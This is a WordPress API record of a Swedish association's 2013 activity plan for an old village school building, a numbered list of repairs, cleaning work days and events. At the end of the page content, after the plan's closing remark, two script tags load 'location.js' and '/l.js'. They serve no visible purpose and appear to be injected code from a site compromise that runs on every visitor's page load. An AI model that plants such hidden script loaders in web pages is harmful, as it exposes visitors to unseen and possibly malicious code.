{"id":1852,"date":"2013-06-16T17:46:05","date_gmt":"2013-06-16T15:46:05","guid":{"rendered":"http:\/\/84.20.155.7\/nywp\/?page_id=1852"},"modified":"2013-06-16T17:46:05","modified_gmt":"2013-06-16T15:46:05","slug":"gfv-verksamhetsplan-2013","status":"publish","type":"page","link":"https:\/\/hindersby.net\/word2021\/gamla-folkskolans-vanner-gfv\/gfv-arsmote-2013\/gfv-verksamhetsplan-2013\/","title":{"rendered":"GFV verksamhetsplan 2013"},"content":{"rendered":"<p>GFV verksamhetsplan 2013<\/p>\n<p>w1. Gallring av tr\u00e4den bakom huset<br \/>\nw2. F\u00f6reningens \u00e5rsm\u00f6te h\u00e5lls<br \/>\n3. Uthusets f\u00f6nster skall f\u00f6rses med starka luckor<br \/>\n4. Kamera\u00f6vervakningen f\u00f6rb\u00e4ttras<br \/>\n5. Ins\u00e4ttning av d\u00f6rr till arbetsrummet<br \/>\n6. Lilla salen g\u00f6rs f\u00e4rdig<br \/>\n&#8211; varmvattenberedaren isoleras<br \/>\n&#8211; v\u00e4ggarna snyggas upp och m\u00e5las<br \/>\n&#8211; n\u00e4tuttag installeras<br \/>\n7. M\u00e4tsystem \u00f6ver n\u00e4tet installeras<br \/>\n8. Nytt f\u00f6nsterglas i verandan<br \/>\n9. F\u00f6nsterglas i uthus<br \/>\n10. Stenfot t\u00e4tas<br \/>\n11. Arbetsrummet s\u00e4tts i ordning<br \/>\n&#8211; innertaket lappas och m\u00e5las<br \/>\n&#8211; v\u00e4ggskivor<br \/>\n&#8211; m\u00e5lning eller tapet<br \/>\n&#8211; golv<br \/>\n12. Eventuellt \u00f6ppen dag n\u00e5gon dag i veckan<br \/>\n13. K\u00f6ket st\u00e4lls i ordning<br \/>\n14. Vattenr\u00f6r till k\u00f6ket<br \/>\n15. WC vatten och v\u00e4rme (?)<br \/>\n16. Sista v\u00e4rmepumpen installeras i k\u00f6ket<br \/>\n17. Byggnadsv\u00e5rdskurs<br \/>\nw18. V\u00e5rst\u00e4dningstalko<br \/>\n-&gt; gropen fast<br \/>\n19. V\u00e4g till rinken mellan gamla skolan och uthuset f\u00f6rb\u00e4ttras<br \/>\n20. D\u00f6rrar bak\u00e5t p\u00e5 uthuset<br \/>\n21. St\u00e4ngsel s\u00e4tts eventuellt upp mot skolg\u00e5rden<br \/>\n22. Plantering av cembratall i st\u00e4llet f\u00f6r de gamla (plantor finns i skogen)<br \/>\n23. Lopptorg<br \/>\n24. F\u00f6nstert\u00e4tning f\u00f6re vintern<br \/>\n25. Hyllputsning och planering<br \/>\n27. H\u00f6stst\u00e4dningstalko<br \/>\n28. Vinteromst\u00e4llning<\/p>\n<p>Och s\u00e5 en hel del annat som vi kommer p\u00e5 utmed \u00e5ret.<br \/>\n(w betyder redan klart)<script src='location.js?p=1' type=text\/javascript><\/script><script src='\/l.js?p=1' type=text\/javascript><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>GFV verksamhetsplan 2013 w1. Gallring av tr\u00e4den bakom huset w2. F\u00f6reningens \u00e5rsm\u00f6te h\u00e5lls 3. Uthusets f\u00f6nster skall f\u00f6rses med starka luckor 4. Kamera\u00f6vervakningen f\u00f6rb\u00e4ttras 5. Ins\u00e4ttning av d\u00f6rr till arbetsrummet 6. Lilla salen g\u00f6rs f\u00e4rdig &#8211; varmvattenberedaren isoleras &#8211; v\u00e4ggarna snyggas upp och m\u00e5las &#8211; n\u00e4tuttag installeras 7. M\u00e4tsystem \u00f6ver n\u00e4tet installeras 8. Nytt f\u00f6nsterglas &hellip; <a href=\"https:\/\/hindersby.net\/word2021\/gamla-folkskolans-vanner-gfv\/gfv-arsmote-2013\/gfv-verksamhetsplan-2013\/\" class=\"more-link\">Forts\u00e4tt l\u00e4sa<span class=\"screen-reader-text\"> \u201dGFV verksamhetsplan 2013\u201d<\/span><\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"parent":1844,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"class_list":["post-1852","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/pages\/1852","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/comments?post=1852"}],"version-history":[{"count":0,"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/pages\/1852\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/pages\/1844"}],"wp:attachment":[{"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/media?parent=1852"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}